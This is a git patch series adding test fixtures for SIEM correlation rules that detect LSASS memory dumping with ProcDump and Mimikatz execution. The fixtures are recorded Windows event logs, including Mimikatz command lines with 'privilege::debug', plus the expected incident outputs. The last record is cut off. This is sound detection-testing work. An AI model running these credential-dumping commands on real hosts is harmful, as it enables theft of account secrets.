Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../mitre_attck_cred_access/LSASS_ProcDump/tests/test_1.sc | 6 ++++++ 1 file changed, 6 insertions(+) create mode 100644 packages/windows_open_package/correlation_rules/mitre_attck_cred_access/LSASS_ProcDump/tests/test_1.sc diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/LSASS_ProcDump/tests/test_1.sc b/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/LSASS_ProcDump/tests/test_1.sc new file mode 100644 index 00000000..0788761c --- /dev/null +++ b/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/LSASS_ProcDump/tests/test_1.sc @@ -0,0 +1,6 @@ +{"action": "access", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"10\",\"Version\":\"3\",\"Level\":\"4\",\"Task\":\"10\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-03-17T19:09:41.3288680Z\"},\"EventRecordID\":\"4434\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"344\",\"ThreadID\":\"2032\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"PC04.example.corp\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2019-03-17 19:09:41.328\"},{\"Name\":\"SourceProcessGUID\",\"text\":\"{365abb72-9b75-5c8e-0000-0010013f1200}\"},{\"Name\":\"SourceProcessId\",\"text\":\"1856\"},{\"Name\":\"SourceThreadId\",\"text\":\"980\"},{\"Name\":\"SourceImage\",\"text\":\"C:\\\\Users\\\\IEUser\\\\Desktop\\\\procdump.exe\"},{\"Name\":\"TargetProcessGUID\",\"text\":\"{365abb72-0886-5c8f-0000-001030560000}\"},{\"Name\":\"TargetProcessId\",\"text\":\"476\"},{\"Name\":\"TargetImage\",\"text\":\"C:\\\\Windows\\\\system32\\\\lsass.exe\"},{\"Name\":\"GrantedAccess\",\"text\":\"0x1fffff\"},{\"Name\":\"CallTrace\",\"text\":\"C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll+4595c|C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll+1d4da|C:\\\\Windows\\\\system32\\\\kernel32.dll+3cc47|C:\\\\Windows\\\\system32\\\\kernel32.dll+3ff99|C:\\\\Windows\\\\system32\\\\dbghelp.dll+4c791|C:\\\\Windows\\\\system32\\\\dbghelp.dll+4dcab|C:\\\\Windows\\\\system32\\\\dbghelp.dll+4a1b8|C:\\\\Windows\\\\system32\\\\dbghelp.dll+45b81|C:\\\\Windows\\\\system32\\\\dbghelp.dll+45e2a|C:\\\\Users\\\\IEUser\\\\Desktop\\\\procdump.exe+11a8d|C:\\\\Users\\\\IEUser\\\\Desktop\\\\procdump.exe+116a6|C:\\\\Users\\\\IEUser\\\\Desktop\\\\procdump.exe+11610|C:\\\\Users\\\\IEUser\\\\Desktop\\\\procdump.exe+11356|C:\\\\Windows\\\\system32\\\\kernel32.dll+4ef8c|C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll+6367a|C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll+6364d\"}]}}}", "category.generic": "Process", "category.high": "System Management", "category.low": "Manipulation", "datafield5": "980", "datafield9": "C:\\Windows\\SYSTEM32\\ntdll.dll+4595c|C:\\Windows\\SYSTEM32\\ntdll.dll+1d4da|C:\\Windows\\system32\\kernel32.dll+3cc47|C:\\Windows\\system32\\kernel32.dll+3ff99|C:\\Windows\\system32\\dbghelp.dll+4c791|C:\\Windows\\system32\\dbghelp.dll+4dcab|C:\\Windows\\system32\\dbghelp.dll+4a1b8|C:\\Windows\\system32\\dbghelp.dll+45b81|C:\\Windows\\system32\\dbghelp.dll+45e2a|C:\\Users\\IEUser\\Desktop\\procdump.exe+11a8d|C:\\Users\\IEUser\\Desktop\\procdump.exe+116a6|C:\\Users\\IEUser\\Desktop\\procdump.exe+11610|C:\\Users\\IEUser\\Desktop\\procdump.exe+11356|C:\\Windows\\system32\\kernel32.dll+4ef8c|C:\\Windows\\SYSTEM32\\ntdll.dll+6367a|C:\\Windows\\SYSTEM32\\ntdll.dll+6364d", "event_src.category": "Other", "event_src.fqdn": "pc04.example.corp", "event_src.host": "pc04.example.corp", "event_src.hostname": "pc04", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_10_Process_access", "importance": "low", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "10", "normalized": true, "object": "process", "object.process.fullpath": "c:\\windows\\system32\\lsass.exe", "object.process.guid": "365abb72-0886-5c8f-0000-001030560000", "object.process.id": "476", "object.process.name": "lsass.exe", "object.process.path": "c:\\windows\\system32\\", "object.property": "GrantedAccess", "object.value": "0x1fffff", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-03T08:45:00.165Z", "status": "success", "subject": "process", "subject.process.fullpath": "c:\\users\\ieuser\\desktop\\procdump.exe", "subject.process.guid": "365abb72-9b75-5c8e-0000-0010013f1200", "subject.process.id": "1856", "subject.process.name": "procdump.exe", "subject.process.path": "c:\\users\\ieuser\\desktop\\", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-03-17T19:09:41.328Z", "type": "raw", "uuid": "75b68542-dad6-4a5a-9166-494ff20a9d45"} +{"action": "create", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"11\",\"Version\":\"2\",\"Level\":\"4\",\"Task\":\"11\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-03-17T19:09:41.3288680Z\"},\"EventRecordID\":\"4433\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"344\",\"ThreadID\":\"2032\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"PC04.example.corp\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2019-03-17 19:09:41.318\"},{\"Name\":\"ProcessGuid\",\"text\":\"{365abb72-9b75-5c8e-0000-0010013f1200}\"},{\"Name\":\"ProcessId\",\"text\":\"1856\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Users\\\\IEUser\\\\Desktop\\\\procdump.exe\"},{\"Name\":\"TargetFilename\",\"text\":\"C:\\\\Users\\\\IEUser\\\\Desktop\\\\lsass.exe_190317_120941.dmp\"},{\"Name\":\"CreationUtcTime\",\"text\":\"2019-03-17 19:09:41.318\"}]}}}", "category.generic": "File System Object", "category.high": "System Management", "category.low": "Manipulation", "event_src.category": "Other", "event_src.fqdn": "pc04.example.corp", "event_src.host": "pc04.example.corp", "event_src.hostname": "pc04", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_11_File_create", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "11", "normalized": true, "object": "file_object", "object.fullpath": "c:\\users\\ieuser\\desktop\\lsass.exe_190317_120941.dmp", "object.name": "lsass.exe_190317_120941.dmp", "object.path": "c:\\users\\ieuser\\desktop\\", "object.property": "creation time", "object.value": "2019-03-17T19:09:41.318Z", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-03T08:45:00.165Z", "status": "success", "subject": "process", "subject.process.fullpath": "c:\\users\\ieuser\\desktop\\procdump.exe", "subject.process.guid": "365abb72-9b75-5c8e-0000-0010013f1200", "subject.process.id": "1856", "subject.process.name": "procdump.exe", "subject.process.path": "c:\\users\\ieuser\\desktop\\", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-03-17T19:09:41.318Z", "type": "raw", "uuid": "c7f7e825-4f3e-47b4-920e-3e111f20d163"} + +# Тут будет твой тест. В секции expect укажи сколько и каких корреляционных событий ты ожидаешь +expect 1 {"action": "create", "category.generic": "Attack", "category.high": "Credential Access", "category.low": "OS Credential Dumping", "correlation_name": "LSASS_ProcDump", "correlation_type": "incident", "event_src.category": "Other", "event_src.host": "pc04.example.corp", "event_src.hostname": "pc04", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "importance": "high", "incident.category": "SoftwareSuspiciousActivity", "incident.severity": "high", "object": "file_object", "object.fullpath": "c:\\users\\ieuser\\desktop\\lsass.exe_190317_120941.dmp", "object.name": "lsass.exe_190317_120941.dmp", "object.path": "c:\\users\\ieuser\\desktop\\", "object.process.fullpath": "c:\\windows\\system32\\lsass.exe", "object.process.guid": "365abb72-0886-5c8f-0000-001030560000", "object.process.id": "476", "object.process.name": "lsass.exe", "object.process.path": "c:\\windows\\system32\\", "object.property": "creation time", "object.value": "2019-03-17T19:09:41.318Z", "status": "success", "subject": "process", "subject.process.fullpath": "c:\\users\\ieuser\\desktop\\procdump.exe", "subject.process.guid": "365abb72-9b75-5c8e-0000-0010013f1200", "subject.process.id": "1856", "subject.process.name": "procdump.exe", "subject.process.path": "c:\\users\\ieuser\\desktop\\"} + From 1eba4650384fc46f422e8441f35cd1a228a743e8 Mon Sep 17 00:00:00 2001 From: shadow2033 <135636880+shadow2033@users.noreply.github.com> Date: Sat, 29 Jul 2023 19:03:34 +0300 Subject: [PATCH 11/57] =?UTF-8?q?=D0=94=D0=BE=D0=B1=D0=B0=D0=B2=D0=BB?= =?UTF-8?q?=D0=B5=D0=BD=D1=8B=20=D0=BC=D0=BE=D0=B4=D1=83=D0=BB=D1=8C=D0=BD?= =?UTF-8?q?=D1=8B=D0=B5=20=D1=82=D0=B5=D1=81=D1=82=D1=8B=20=D0=B4=D0=BB?= =?UTF-8?q?=D1=8F=20=D0=BF=D1=80=D0=B0=D0=B2=D0=B8=D0=BB=D0=B0=20(Mimikatz?= =?UTF-8?q?)?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../mitre_attck_cred_access/Mimikatz/tests/test_1.sc | 4 ++++ .../mitre_attck_cred_access/Mimikatz/tests/test_2.sc | 4 ++++ .../mitre_attck_cred_access/Mimikatz/tests/test_3.sc | 4 ++++ 3 files changed, 12 insertions(+) create mode 100644 packages/windows_open_package/correlation_rules/mitre_attck_cred_access/Mimikatz/tests/test_1.sc create mode 100644 packages/windows_open_package/correlation_rules/mitre_attck_cred_access/Mimikatz/tests/test_2.sc create mode 100644 packages/windows_open_package/correlation_rules/mitre_attck_cred_access/Mimikatz/tests/test_3.sc diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/Mimikatz/tests/test_1.sc b/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/Mimikatz/tests/test_1.sc new file mode 100644 index 00000000..603be60f --- /dev/null +++ b/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/Mimikatz/tests/test_1.sc @@ -0,0 +1,4 @@ +{"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Security-Auditing\",\"Guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\"},\"EventID\":\"4688\",\"Version\":\"2\",\"Level\":\"0\",\"Task\":\"13312\",\"Opcode\":\"0\",\"Keywords\":\"0x8020000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-01-23T10:18:31.616030800Z\"},\"EventRecordID\":\"6925090\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"4\",\"ThreadID\":\"5460\"},\"Channel\":\"Security\",\"Computer\":\"WIN10X64-133.testlab.org\",\"Security\":null},\"EventData\":{\"Data\":[{\"text\":\"S-1-5-21-3389064948-2957360831-125328159-1105\",\"Name\":\"SubjectUserSid\"},{\"text\":\"test-admin\",\"Name\":\"SubjectUserName\"},{\"text\":\"TESTLAB\",\"Name\":\"SubjectDomainName\"},{\"text\":\"0x1c3869\",\"Name\":\"SubjectLogonId\"},{\"text\":\"0xb28\",\"Name\":\"NewProcessId\"},{\"text\":\"C:\\\\Users\\\\test-admin\\\\Documents\\\\Tools for raw events\\\\mimikatz\\\\x64\\\\mimikatz.exe\",\"Name\":\"NewProcessName\"},{\"text\":\"%%1937\",\"Name\":\"TokenElevationType\"},{\"text\":\"0x1530\",\"Name\":\"ProcessId\"},{\"text\":\"\\\"C:\\\\Users\\\\test-admin\\\\Documents\\\\Tools for raw events\\\\mimikatz\\\\x64\\\\mimikatz.exe\\\" privilege::debug\",\"Name\":\"CommandLine\"},{\"text\":\"S-1-0-0\",\"Name\":\"TargetUserSid\"},{\"text\":\"-\",\"Name\":\"TargetUserName\"},{\"text\":\"-\",\"Name\":\"TargetDomainName\"},{\"text\":\"0x0\",\"Name\":\"TargetLogonId\"},{\"text\":\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"Name\":\"ParentProcessName\"},{\"text\":\"S-1-16-12288\",\"Name\":\"MandatoryLabel\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "event_src.category": "Operating system", "event_src.fqdn": "win10x64-133.testlab.org", "event_src.host": "win10x64-133.testlab.org", "event_src.hostname": "win10x64-133", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "historical": false, "id": "PT_Microsoft_Windows_eventlog_4688_A_new_process_has_been_created", "importance": "info", "input_id": "d8c86b6f-83bf-4c13-921b-a8403077119a", "job_id": "a4d09d11-927a-4cb6-9f4f-971106247fdd", "mime": "application/x-pt-eventlog", "msgid": "4688", "normalized": true, "object": "process", "object.account.domain": "testlab", "object.account.id": "S-1-5-21-3389064948-2957360831-125328159-1105", "object.account.name": "test-admin", "object.account.session_id": "1849449", "object.process.cmdline": "\"C:\\Users\\test-admin\\Documents\\Tools for raw events\\mimikatz\\x64\\mimikatz.exe\" privilege::debug", "object.process.fullpath": "c:\\users\\test-admin\\documents\\tools for raw events\\mimikatz\\x64\\mimikatz.exe", "object.process.id": "2856", "object.process.name": "mimikatz.exe", "object.process.parent.fullpath": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe", "object.process.parent.id": "5424", "object.process.parent.name": "powershell.exe", "object.process.parent.path": "c:\\windows\\system32\\windowspowershell\\v1.0\\", "object.process.path": "c:\\users\\test-admin\\documents\\tools for raw events\\mimikatz\\x64\\", "recv_ipv4": "192.168.40.146", "recv_time": "2020-01-27T06:12:53Z", "status": "success", "subject": "account", "subject.account.domain": "testlab", "subject.account.id": "S-1-5-21-3389064948-2957360831-125328159-1105", "subject.account.name": "test-admin", "subject.account.privileges": "TokenElevationTypeFull", "subject.account.session_id": "1849449", "subject.state": "on behalf of oneself", "tag": "wineventlog", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-01-23T10:18:31.616Z", "uuid": "00000005-e2e7-0f65-f000-0000119dd0a4"} + +# Тут будет твой тест. В секции expect укажи сколько и каких корреляционных событий ты ожидаешь +expect 1 {"action": "start", "category.generic": "Attack", "category.high": "Credential Access", "category.low": "OS Credential Dumping", "correlation_name": "Mimikatz", "correlation_type": "incident", "event_src.fqdn": "win10x64-133.testlab.org", "event_src.host": "win10x64-133.testlab.org", "event_src.hostname": "win10x64-133", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "importance": "medium", "incident.aggregation.key": "Mimikatz|win10x64-133.testlab.org|s-1-5-21-3389064948-2957360831-125328159-1105", "incident.aggregation.timeout": 7200, "incident.category": "Undefined", "incident.severity": "medium", "object": "process", "object.account.domain": "testlab", "object.account.id": "S-1-5-21-3389064948-2957360831-125328159-1105", "object.account.name": "test-admin", "object.account.session_id": "1849449", "object.process.cmdline": "\"C:\\Users\\test-admin\\Documents\\Tools for raw events\\mimikatz\\x64\\mimikatz.exe\" privilege::debug", "object.process.fullpath": "c:\\users\\test-admin\\documents\\tools for raw events\\mimikatz\\x64\\mimikatz.exe", "object.process.id": "2856", "object.process.name": "mimikatz.exe", "object.process.parent.fullpath": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe", "object.process.parent.id": "5424", "object.process.parent.name": "powershell.exe", "object.process.parent.path": "c:\\windows\\system32\\windowspowershell\\v1.0\\", "object.process.path": "c:\\users\\test-admin\\documents\\tools for raw events\\mimikatz\\x64\\", "status": "success", "subject": "account", "subject.account.domain": "testlab", "subject.account.id": "S-1-5-21-3389064948-2957360831-125328159-1105", "subject.account.name": "test-admin", "subject.account.privileges": "TokenElevationTypeFull", "subject.account.session_id": "1849449"} diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/Mimikatz/tests/test_2.sc b/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/Mimikatz/tests/test_2.sc new file mode 100644 index 00000000..9ff76027 --- /dev/null +++ b/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/Mimikatz/tests/test_2.sc @@ -0,0 +1,4 @@ +{"action": "start", "body": "{ \"Event\": { \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\", \"System\": { \"Provider\": { \"Name\": \"Microsoft-Windows-Sysmon\", \"Guid\": \"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}\" }, \"EventID\": \"1\", \"Version\": \"5\", \"Level\": \"4\", \"Task\": \"1\", \"Opcode\": \"0\", \"Keywords\": \"0x8000000000000000\", \"TimeCreated\": { \"SystemTime\": \"2021-09-06T17:42:56.157650300Z\" }, \"EventRecordID\": \"1263128\", \"Correlation\": null, \"Execution\": { \"ProcessID\": \"1316\", \"ThreadID\": \"1724\" }, \"Channel\": \"Microsoft-Windows-Sysmon/Operational\", \"Computer\": \"Test_w7x64-131.testlab.org\", \"Security\": { \"UserID\": \"S-1-5-18\" } }, \"EventData\": { \"Data\": [ { \"Name\": \"RuleName\" }, { \"text\": \"2021-09-06 17:42:56.155\", \"Name\": \"UtcTime\" }, { \"text\": \"{7C221102-5320-6136-0000-00107650FA03}\", \"Name\": \"ProcessGuid\" }, { \"text\": \"341952\", \"Name\": \"ProcessId\" }, { \"text\": \"C:\\\\Users\\\\vasya\\\\Desktop\\\\mimi\\\\x64\\\\mimikatz.exe\", \"Name\": \"Image\" }, { \"text\": \"2.2.0.0\", \"Name\": \"FileVersion\" }, { \"text\": \"mimikatz for Windows\", \"Name\": \"Description\" }, { \"text\": \"mimikatz\", \"Name\": \"Product\" }, { \"text\": \"gentilkiwi (Benjamin DELPY)\", \"Name\": \"Company\" }, { \"text\": \"mimikatz.exe\", \"Name\": \"OriginalFileName\" }, { \"text\": \"\\\"C:\\\\Users\\\\vasya\\\\Desktop\\\\mimi\\\\x64\\\\mimikatz.exe\\\"\", \"Name\": \"CommandLine\" }, { \"text\": \"C:\\\\Users\\\\vasya\\\\Desktop\\\\mimi\\\\x64\\\\\", \"Name\": \"CurrentDirectory\" }, { \"text\": \"TESTLAB\\\\vasya\", \"Name\": \"User\" }, { \"text\": \"{7C221102-5246-6136-0000-0020E180F103}\", \"Name\": \"LogonGuid\" }, { \"text\": \"0x3f180e1\", \"Name\": \"LogonId\" }, { \"text\": \"2\", \"Name\": \"TerminalSessionId\" }, { \"text\": \"High\", \"Name\": \"IntegrityLevel\" }, { \"text\": \"MD5=BB8BDB3E8C92E97E2F63626BC3B254C4,SHA256=912018AB3C6B16B39EE84F17745FF0C80A33CEE241013EC35D0281E40C0658D9\", \"Name\": \"Hashes\" }, { \"text\": \"{7C221102-52F8-6136-0000-00101D0BFA03}\", \"Name\": \"ParentProcessGuid\" }, { \"text\": \"341612\", \"Name\": \"ParentProcessId\" }, { \"text\": \"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\", \"Name\": \"ParentImage\" }, { \"text\": \"\\\"C:\\\\WINDOWS\\\\system32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\" \", \"Name\": \"ParentCommandLine\" } ] }, \"RenderingInfo\": { \"Culture\": \"en-US\", \"Message\": \"Process Create:\\r\\nRuleName: \\r\\nUtcTime: 2021-09-06 17:42:56.155\\r\\nProcessGuid: {7C221102-5320-6136-0000-00107650FA03}\\r\\nProcessId: 341952\\r\\nImage: C:\\\\Users\\\\vasya\\\\Desktop\\\\mimi\\\\x64\\\\mimikatz.exe\\r\\nFileVersion: 2.2.0.0\\r\\nDescription: mimikatz for Windows\\r\\nProduct: mimikatz\\r\\nCompany: gentilkiwi (Benjamin DELPY)\\r\\nOriginalFileName: mimikatz.exe\\r\\nCommandLine: \\\"C:\\\\Users\\\\vasya\\\\Desktop\\\\mimi\\\\x64\\\\mimikatz.exe\\\"\\r\\nCurrentDirectory: C:\\\\Users\\\\vasya\\\\Desktop\\\\mimi\\\\x64\\\\\\r\\nUser: TESTLAB\\\\vasya\\r\\nLogonGuid: {7C221102-5246-6136-0000-0020E180F103}\\r\\nLogonId: 0x3f180e1\\r\\nTerminalSessionId: 2\\r\\nIntegrityLevel: High\\r\\nHashes: MD5=BB8BDB3E8C92E97E2F63626BC3B254C4,SHA256=912018AB3C6B16B39EE84F17745FF0C80A33CEE241013EC35D0281E40C0658D9\\r\\nParentProcessGuid: {7C221102-52F8-6136-0000-00101D0BFA03}\\r\\nParentProcessId: 341612\\r\\nParentImage: C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\r\\nParentCommandLine: \\\"C:\\\\WINDOWS\\\\system32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\" \", \"Level\": \"Information\", \"Task\": \"Process Create (rule: ProcessCreate)\", \"Opcode\": \"Info\", \"Channel\": null, \"Provider\": null, \"Keywords\": null } } }", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "7C221102-5246-6136-0000-0020E180F103", "event_src.category": "Other", "event_src.fqdn": "test_w7x64-131.testlab.org", "event_src.host": "test_w7x64-131.testlab.org", "event_src.hostname": "test_w7x64-131", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "testlab", "object.account.id": "synthetic:vasya@testlab", "object.account.name": "vasya", "object.account.privileges": "High", "object.account.session_id": "66158817", "object.process.cmdline": "\"C:\\Users\\vasya\\Desktop\\mimi\\x64\\mimikatz.exe\"", "object.process.cwd": "C:\\Users\\vasya\\Desktop\\mimi\\x64\\", "object.process.fullpath": "c:\\users\\vasya\\desktop\\mimi\\x64\\mimikatz.exe", "object.process.guid": "7C221102-5320-6136-0000-00107650FA03", "object.process.hash.md5": "BB8BDB3E8C92E97E2F63626BC3B254C4", "object.process.hash.sha256": "912018AB3C6B16B39EE84F17745FF0C80A33CEE241013EC35D0281E40C0658D9", "object.process.id": "341952", "object.process.meta": "Description:mimikatz for Windows | Product:mimikatz | Company:gentilkiwi (Benjamin DELPY)", "object.process.name": "mimikatz.exe", "object.process.original_name": "mimikatz.exe", "object.process.parent.cmdline": "\"C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\powershell.exe\"", "object.process.parent.fullpath": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe", "object.process.parent.guid": "7C221102-52F8-6136-0000-00101D0BFA03", "object.process.parent.id": "341612", "object.process.parent.name": "powershell.exe", "object.process.parent.path": "c:\\windows\\system32\\windowspowershell\\v1.0\\", "object.process.path": "c:\\users\\vasya\\desktop\\mimi\\x64\\", "object.process.version": "2.2.0.0", "recv_ipv4": "127.0.0.1", "recv_time": "2021-09-09T13:33:10Z", "status": "success", "subject": "account", "subject.account.domain": "testlab", "subject.account.id": "synthetic:vasya@testlab", "subject.account.name": "vasya", "subject.account.privileges": "High", "subject.account.session_id": "66158817", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2021-09-06T17:42:56.155Z", "type": "raw", "uuid": "7530d5f1-b693-4aec-8286-5694335292e9"} + +# Тут будет твой тест. В секции expect укажи сколько и каких корреляционных событий ты ожидаешь +expect 1 {"action": "start", "category.generic": "Attack", "category.high": "Credential Access", "category.low": "OS Credential Dumping", "correlation_name": "Mimikatz", "correlation_type": "incident", "datafield6": "7C221102-5246-6136-0000-0020E180F103", "event_src.fqdn": "test_w7x64-131.testlab.org", "event_src.host": "test_w7x64-131.testlab.org", "event_src.hostname": "test_w7x64-131", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "importance": "medium", "incident.aggregation.key": "Mimikatz|test_w7x64-131.testlab.org|synthetic:vasya@testlab", "incident.aggregation.timeout": 7200, "incident.category": "Undefined", "incident.severity": "medium", "object": "process", "object.account.domain": "testlab", "object.account.id": "synthetic:vasya@testlab", "object.account.name": "vasya", "object.account.session_id": "66158817", "object.process.cmdline": "\"C:\\Users\\vasya\\Desktop\\mimi\\x64\\mimikatz.exe\"", "object.process.cwd": "C:\\Users\\vasya\\Desktop\\mimi\\x64\\", "object.process.fullpath": "c:\\users\\vasya\\desktop\\mimi\\x64\\mimikatz.exe", "object.process.guid": "7C221102-5320-6136-0000-00107650FA03", "object.process.hash.md5": "BB8BDB3E8C92E97E2F63626BC3B254C4", "object.process.hash.sha256": "912018AB3C6B16B39EE84F17745FF0C80A33CEE241013EC35D0281E40C0658D9", "object.process.id": "341952", "object.process.meta": "Description:mimikatz for Windows | Product:mimikatz | Company:gentilkiwi (Benjamin DELPY)", "object.process.name": "mimikatz.exe", "object.process.original_name": "mimikatz.exe", "object.process.parent.cmdline": "\"C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\powershell.exe\"", "object.process.parent.fullpath": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe", "object.process.parent.guid": "7C221102-52F8-6136-0000-00101D0BFA03", "object.process.parent.id": "341612", "object.process.parent.name": "powershell.exe", "object.process.parent.path": "c:\\windows\\system32\\windowspowershell\\v1.0\\", "object.process.path": "c:\\users\\vasya\\desktop\\mimi\\x64\\", "object.process.version": "2.2.0.0", "status": "success", "subject": "account", "subject.account.domain": "testlab", "subject.account.id": "synthetic:vasya@testlab", "subject.account.name": "vasya", "subject.account.privileges": "High", "subject.account.session_id": "66158817"} \ No newline at end of file diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/Mimikatz/tests/test_3.sc b/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/Mimikatz/tests/test_3.sc new file mode 100644 index 00000000..748eb41e --- /dev/null +++ b/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/Mimikatz/tests/test_3.sc @@ -0,0 +1,4 @@ +{"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2023-05-15T09:53:08.1290798Z\"},\"EventRecordID\":\"21121982\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2984\",\"ThreadID\":\"1920\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"Win10x64-154.testlab.esc\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"text\":\"-\",\"Name\":\"RuleName\"},{\"text\":\"2023-05-15 09:53:08.126\",\"Name\":\"UtcTime\"},{\"text\":\"{63310a87-0104-6462-5d1f-000000001b00}\",\"Name\":\"ProcessGuid\"},{\"text\":\"3700\",\"Name\":\"ProcessId\"},{\"text\":\"C:\\\\tools\\\\bibikatz_trunk\\\\x64\\\\bibikatz.exe\",\"Name\":\"Image\"},{\"text\":\"2.2.0.0\",\"Name\":\"FileVersion\"},{\"text\":\"custom file description\",\"Name\":\"Description\"},{\"text\":\"bibikatz\",\"Name\":\"Product\"},{\"text\":\"Custom company\",\"Name\":\"Company\"},{\"text\":\"bibikatz.exe\",\"Name\":\"OriginalFileName\"},{\"text\":\"bibikatz.exe privilege::debug 